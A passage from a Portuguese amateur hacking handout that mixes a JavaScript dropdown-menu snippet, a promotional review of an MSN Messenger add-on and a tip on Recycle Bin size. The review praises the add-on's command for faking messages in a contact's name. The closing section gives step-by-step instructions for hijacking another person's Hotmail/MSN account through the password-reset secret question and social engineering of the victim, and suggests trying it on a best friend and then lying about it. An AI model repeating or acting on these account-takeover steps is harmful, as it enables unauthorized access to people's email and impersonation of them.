redirecionamento, e se a pessoa acessar manualmente o endereço, será levada para a página especificada (em vez de ver o conteúdo do diretório, o que é padrão e comum em muitos servidores de hospedagem). Menu em lista suspensa É o tipo de menu utilizado atualmente na parte "Explorando tudo", no topo do Explorando: uma lista, e quando a pessoa escolhe um item, vai para a página correspondente a ele. É fácil, apenas tenha cuidado com as duas partes do código. Você pode colocar tudo próximo, para não se perder. Veja: <script> function vaiArq(){ var vai1x = document.arqform.arqvx.value; if (vai1x != '#') { top.location.href = document.arqform.arqvx.value; } } </script> <form name="arqform"> <select name="arqvx" onchange="vaiArq();"> <option value="#">Escolha aqui...</option> <option value="pagina1.htm">Página 1</option> <option value="pagina2.htm">Página 2</option> <option value="pagina3.htm">Página 3</option> </select> </form> A função vaiArq() é chamada quando o item da lista for alterado (pelo evento "onchange"). Incluo nesta função um verificador; para textos e descrições, defina o valor "#", assim ele não faz nada. Para abrir em nova janela, mude a parte "top.location...". Troque-a por isso: window.open(vai1x,"janela123",""); Onde "janela123" é o identificador da janela (nome do frame, também), você pode trocar pelo que quiser. Se você for usar duas ou mais listas, deverá renomear o formulário, e a variável "vai1x", além do nome da função também ("vaiArq"), substituindo no código das outras listas todas as ocorrências necessárias. Bom, é isso por hoje... Uma orientação de otimização, mas que pode confundir iniciantes (ou mesmo os mais experientes, se o código for grande), é colocar todos os scripts da página dentro de um único par de tags <script> e </script>. Isso otimiza para o navegador, que lê um só bloco de código, sem precisar ficar verificando por cada bloco de script.

Você conhece o programa:Messenger Discovery Live?
Messenger Discovery Live é um add-on para o mensageiro instantâneo Windows Live Messenger — assim como o Messenger Plus! — mas com características únicas e exclusivas. Ele é pequeno e se aloja na barra do sistema (ao lado do relógio do Windows) permitindo que o usuário acesse-o rapidamente e execute diversas funcionalidades diferentes do famoso Plus! É possível trabalhar com comandos de linha e muitas das suas características podem ser utilizadas através de comandos na própria janela de conversa. Não possui spywares, adwares ou programas maliciosos e você pode utilizá-lo junto ao Messenger Plus! COMANDO !IMITATE Esta característica é peculiarmente a que mais chama atenção entre os usuários deste software, pois através de um único comando, você poderá enviar mensagens como se fosse a pessoa que está do outro lado da conversa. Isso mesmo! Desta forma será possível enganar seus amigos, fingindo que foram eles que mandaram a mensagem. Como funciona? Com o programa instalado, abra a janela de conversação com um contato, fale com a pessoa e no meio da conversa digite: "!imitate fala". Seguidamente aparecerá uma mensagem onde o seu contato falará a mensagem "fala" e para ele não mostrará que você digitou o comando !imitate, deixando-o completamente confuso! O mais legal de tudo isso é que o comando é capaz de capturar a cor e tamanho das falas de seus amigos, pregando uma bela peça para seus colegas (Veja a imagem do programa nesta página para conferir como funciona). CARACTERÍSTICAS O Messenger Discovery Live está repleto de características interessantes, confira-as a seguir: Gerenciador de contatos avançado: Seu gerenciador de contatos é muito interessante, com ele o usuário será capaz de visualizar os contatos que o deletaram de sua lista, contabilizar mensagens enviadas e recebidas, ver quando e como foi remetida a última mensagem, obter informações de quanto tempo o usuário está online em sua lista desde que instalou o Discovery e muito mais. Outra característica importante de seu gerenciador é a possibilidade de pegar as imagens dos avatares dos seus amigos! Funções de contato avançadas: Remova as mensagens pessoais e músicas que estão sendo escutadas dos seus amigos, se desejar. Receba alertas quando um contato entrar/sair, deletá-lo/adicioná-lo, retornar de outros status ou abrir/fechar sua janela de conversa. Ferramentas para mensagens instantâneas: Imite seus amigos (já descrito acima), mande mensagens automáticas, programe mensagens para serem enviadas quando um amigo trocar de status, remova/adicione a exibição de quando um amigo está escrevendo uma mensagem, etc. Proteção: Bloqueie: acesso a links não confiáveis, convites de aplicações, winks, emoticons personalizados, mensagens de voz e nudges (opções que tremem a tela de conversa). Formatação de mensagens:

Com o Messenger Discovery Live você poderá remover opções para mudar fonte, cores e estilos de letras, se desejar. Também podese inserir alinhamento à direita em suas mensagens/contatos e utilizar opções que requerem o Messenger Plus! instalado. Outras ferramentas: Tire fotos (screenshots) de vídeos oriundos de webcams com rapidez, crie teclas de atalho, tenha um histórico de nicks, aplique comandos avançados e muito mais. Messenger Discovery Live pode parecer simples e pequeno, mas possui um poder imenso para você deixar seu mensageiro muito mais completo! Não deixe de conferir. Fonte:Baixaki Por Nélio Jaloto Entao esse programa é tipo uma extensao (nao q isso um complemanto)do maior menssageiro da web o msn com ele você tem varias opçoes para brincar e explorar,bom ele parece ter um incompatibilidade com o msn 8.1.0.Eu instalei ele aqui no meu pc ele funcionaa mas tinha hora que ele parava dava paul o msn nao abria etc....incompatibilidade....mas vale apena tentar nao é! Eu baixei ele nao site http://www.invasao.com esse site é seguro e confiavel pode ir sem medo!!!Falando nisso em "segurança" existe ums site que si faz passar pelo da microsoft muito bonitiho mas espalhando viroses para todos os lados é um exemplo o http://www.plugmsn.com !!! Entao depois de baixado o programa instale ele normalmente com o msn fechado é claro si depois você notar alguma diferente no msn (ele fechando toda hora)desista-le o msn e coloque outro mas velho ou mais novo. Vamos entao para as funçoes do programas:

Depois dele istalado você clik com o butao direito do mouse en cima dele e logo em seguida em configuraçoes:

Ele tera essa opçoes ai em cima que nao presiza comentar né gente!!!Depois:

Bla,Bla,Bla,Bla:

Entao chegou a hora boa,ele pode ti dar um alerta quando um contato seu esta "online"ou quando ele ficar "offline" po que legal entao tem muita gente que fica fingindo que nao esta no pc mas com o messenger discoviry nao tem como ehehehehehehehehe......

Olha que show ele tambem tem uma opçao para que os outro contatos seu nao add seus emoticons personalizados rsrsrsrs foda,tambem pedir atençao quantas vezes quiser ehehehehehe si ele (seu contato)te excuir da lista dele você vai ficar sabendo!!!

Para que uma lixeira tão grande?
Por Nélio Jaloto Diminua o tamanho da lixeira. O Windows reserva 10% do espaço de seu disco rígido para a Lixeira. Isso é um desperdício. Clique sobre a Lixeira com o botão direito do mouse e, nas Propriedades, escolha um tamanho menor.Quanto maior o HD, menor pode ser o tamanho reservado para a Lixeira. Eu uso 3%. Você deve decidir pelo tamanho mais apropriado para você.

Como retirar textos de arquivos PDF?!?!?!?...
Por Nélio Jaloto Bom eu nao queria falar sobre esse assunto nao,mas...muitas pessoas gosta de colocar no blog ou entao colocar no orkut nas comu um assuntos desse tipo (hacker),sei que muitos vao si aproveitar disso ,tirando esse texto fodasticos das minhas apostilas falando que foi "ele" que escreveu mas ai vai uma dica coloque meu nome na frente dos textos meus e o do Marcos nos textos dele si nao....ah entao vamos para o assuntos do topico como eu faço para tirar esses textos de arquivo PDF,que ensinar pegar senha do windows (minha primeira apostila) entao você mesmo que nao sabe vai ter que ficar esperando a procima que eu nem sei que assunto eu vou abordar... Dica:para quem nao sabe tem haver com area de tranferencia......

Como "invadir" hotmail de outra pessoal(invasao total msn,Email,etc...).E aonde fica a segurança tio Bill!!!Nao é 100%, Mas funciona.
Por Nélio Jaloto Bom eu nunca vi uma apostila falando nisso entao,essa é a primeira tambem... Um dia eu estava dando uma olhadinha na net e me perguntei. -po todos nos temos um pergunta secreta no e-mail onde eu coloco um pergunta e si por acaso eu perder a minha senha eu respondo ela e recupero a minha senha de novo ou até mesmo coloco um senha nova(esse ponto em que eu quero chegar...) Entao quer dizer,si eu responder a sua pergunta secreta eu invado o seu e-mail,msn etc...!É faz um teste si seu e-mail e veja si nao esta vuneravel ou nao eheheheheh.Bom o certo é nao ter uma pergunta de maneira nehuma sobre o seu particular como "qual o nome do meio do meu pai", "Em qual cidade minha mae nasceu","qual a comida minha preferida".Qualquer uma pode chegar até você e te pergunta e você vai responder, e de cara dando o seu e-mail si a intençao for essa eheheheheh......................................................... Tenta invadi o e-mail de seu melhor amigo (depois enrola ele falando que era pra segurança propria dele,vocês nao sao amigos?) Entao,primeiro passo, vá ao site da hotmail http://www.hotmail.com.br,depois disso clik em "esqueceu sua senha?" vai ter dois campos onde vai pedir para você colocar o e-mail "seu" e outro onde você vai colocar uns caracteres proprio da hotmail.Agora que você colocou o e-mail da pessoa de quem você quer "invadir" vai ter dois link para você clikar,clike em "voce quer responder sua resposta secreta?".Agora você vê qual a pergunta secreta dele (o seu amigo)e faça uma engenharia social nele (falei em engenharia social na minha primeira apostila)para quem nao sabe engenharia social pode ser uma serie de pergunta,perguntada discretamente, ate você chegar naquela respostas apropriada entedeu?!?!(Viu você que nao baixou a minha primeira apostila que fala em segunraça na internet!!! eheheh!!!).Entao mas o assunto do topico nao é esse,vooltando ao assunto...E responda como si fosse ele respondendo,quando você colocar a resposta certa ira ser redirecionado para outra pagina já pedindo para colocar um senha nova no "seu" e-mail(no caso o do seu coleginha).Poxa tio bill poderia pensar melhor nas perguntas secretas das pessoas que usam "hotmail",nao é por acaso que o nome é "pergunta SECRETA" tem quer ser uma pergunta que nem usuario saberia direito ou poderia ter um dica sempre que entrase em seu email "dica do dia" ou entao vocês desse um senha no Prorpio Contratro onde podera dizer que aquela senha é inrrecuperavel e por questao de segurança a pessoa teria que anotar aquela senha(apesar que nao seje recomendado anotar senhas),caso ela esquecer a sua senha atual etende tio Bill...Ai ficou um dica para ele fazer la na hotmail !!!ehehehehe...rsrsrsrsrs...............

Finalizando
Bom obrigado pela colaboraçao pessoal... Dica:para quem nao baixou a minha primeira apostila vale apena nao perca tempo é gratuita assim como essa (primeira apostila http://www.mediafire.com/download.php?bc3o2llto4n), ( Um tema em que eu gosto muito da minha primeira apostila é como pegar senha do adminstrador do Windows e outras!!!Esse é o mais comentado si você ainda não baixou ela baixe que você vai gostar...),ah em menos de um mês,ate 21 de agosto foi baixada 388 apostila minha,nao esperava tanto obrigado mesmo...Valeu Marcos Elias pela colaboraçao desde já .A procima apostila vem ai mas eu nao sei por onde começar,se alguem pode medar um ideia para o nome dela,e ai passar escrever apartir desse tema eu estou aberto a sugestoes meu e-mail nelio_jaloto@hotmail.com ou njaloto_express@yahoo.com meu orkut http://www.orkut.com/Profile.aspx?uid=16422751250869153531 Bom um leitor meu me pediu para eu falar sobre o famoso Editor de Registro (brigado ai Cristiano pela a colaboração),mas entao eu poderia ate falar nisso mas teria que demorar algum messes para eu entender todas as chaves,(por que eu nao conheço todos,so por que eu sou hacker nao quer dizer que eu sei tudo)o Editor de Registro é uma ferramenta muito grande onde tem muitas Vulnerabilidade do Windows,e por isso teria que ficar horas na frente do meu pc analizando isso...Mas talvez eu poderia falar um pouquinho dele na procima apostila tabom Cristiano... Até a procima ediçao das apostila de Nélio Jaloto!!!

"No futuro quem dominar bem a internet,vai ter o mundo em suas mãos" Nélio Jaloto

Sign up to vote on this title
UsefulNot useful